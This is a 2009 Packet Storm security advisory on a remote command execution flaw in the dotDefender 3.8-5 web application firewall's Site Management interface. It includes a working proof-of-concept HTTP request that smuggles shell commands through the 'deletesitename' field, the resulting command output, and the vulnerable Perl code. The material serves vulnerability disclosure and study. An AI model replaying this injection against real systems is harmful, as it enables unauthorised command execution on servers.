dotDefender 3.8-5 Command Execution

2009-12-01T00:00:00
ID PACKETSTORM:83311
Type packetstorm
Reporter John Dos
Modified 2009-12-01T00:00:00

Description

                                        
                                            `Problem Description  
===================  
  
A remote command execution vulnerability exists in the dotDefender  
(3.8-5) Site Management.  
  
  
dotDefender [1] is a web appliaction firewall (WAF) which 'prevents  
hackers from attacking your  
website.'  
  
  
Technical Details  
=================  
  
The Site Management application of dotDefender is reachable as a web  
application (https:site/dotDefender/)  
on the webserver. After passing the Basic Auth login you can  
create/delete applications.  
The mentioned vulnerability is in the 'deletesite' implementation and  
the 'deletesitename' variable.  
Insufficient input validation allows an attacker to inject arbitrary commands.  
  
  
Delete Site  
===========  
  
A normal delete transaction looks as follow:  
  
POST /dotDefender/index.cgi HTTP/1.1  
Host: 172.16.159.132  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;  
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: https://172.16.159.132/dotDefender/index.cgi  
Authorization: Basic YWRtaW46  
Cache-Control: max-age=0  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 76  
  
sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14  
  
An attack looks like:  
  
--------------------/Request/--------------------  
POST /dotDefender/index.cgi HTTP/1.1  
Host: 172.16.159.132  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;  
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: https://172.16.159.132/dotDefender/index.cgi  
Authorization: Basic YWRtaW46  
Cache-Control: max-age=0  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 95  
  
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al  
../;pwd;&action=deletesite&linenum=15  
  
--------------------/Response/--------------------  
[...]  
<br>  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
total 12  
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .  
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..  
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin  
/usr/local/APPCure-full/lib/admin  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
total 12  
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .  
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..  
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin  
/usr/local/APPCure-full/lib/admin  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
total 12  
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .  
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..  
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin  
/usr/local/APPCure-full/lib/admin  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
total 12  
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .  
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..  
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin  
/usr/local/APPCure-full/lib/admin  
[...]  
  
  
  
Affected Code  
=============  
  
The affected code (perl) is in index1.cgi of the admin interface:  
  
311  
312 }elsif($action eq "deletesite") {  
# delete site  
313 $deletesitename=$postFields{"deletesitename"};  
314 $dots_index = index($deletesitename,"%3A");  
315  
316 if($dots_index != -1 ) {  
317 $site_a_part= substr($deletesitename,0,$dots_index);  
318 $site_b_part=  
substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);  
319 $site_a_part=&cleanIt($site_a_part);  
320 $site_b_part=&cleanIt($site_b_part);  
321 $deletesitename = $site_a_part.":".$site_b_part;  
322 }  
323  
324 $linenum=$postFields{'linenum'};  
325 applyDbAudit($action);  
326 &delline($linenum,2);  
327 cleanSiteFingerPrints($deletesitename);  
328  
329 &deleteSiteConf($deletesitename);  
330 $site_params="$CTMP_DIR/".$deletesitename."_params";  
331 system("rm -f $site_params");  
  
  
And applicure-lib2.pl:  
  
13 sub cleanIt {  
14 my($param,$type)=@_;  
15  
16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;  
17 if ($type eq 'any') {  
18 } elsif ($type eq 'filter') {  
19 $param =~ s/\+/" "/eg;  
20 } elsif ($type eq 'path') {  
21 $param = un_urlize($param);  
22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;  
23 #$param =~ s/\+/" "/eg;  
24 } else {  
25 $param =~ s/([^A-Za-z0-9\-_.~'])//g;  
26 }  
27 return $param;  
28 }  
  
  
Here one can see that certain shell control characters are not  
protected by the call to cleanIt. Thus an attacker  
can gain control of the system call in line 331 of index1.cgi.  
  
  
References  
===========  
  
[1] http://applicure.com/  
`